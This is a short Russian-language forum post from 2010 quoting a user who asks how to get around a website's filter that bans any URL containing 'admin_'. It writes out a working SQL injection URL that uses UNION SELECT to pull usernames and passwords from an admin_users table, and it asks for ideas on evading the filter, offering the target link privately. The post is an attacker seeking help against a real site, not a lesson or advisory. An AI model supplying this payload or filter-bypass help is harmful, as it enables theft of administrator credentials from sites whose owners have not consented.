01.12.2010, 22:28
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Сообщение от Nek1t
Есть простенькая SQL-иньекция, но сайт фильтрует(и сразу банит айпишник)
все
урлы, в которых проскакивает слово "admin_".
Т.е. запрос
Код:
http://site.com/index.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user,pass),3+from+admin_users/*
фильтруется. Остальные запросы идут без проблем. Идеи, как обойти?
Через POST скрипт параметры не берет. Линк в личку.
|
|
|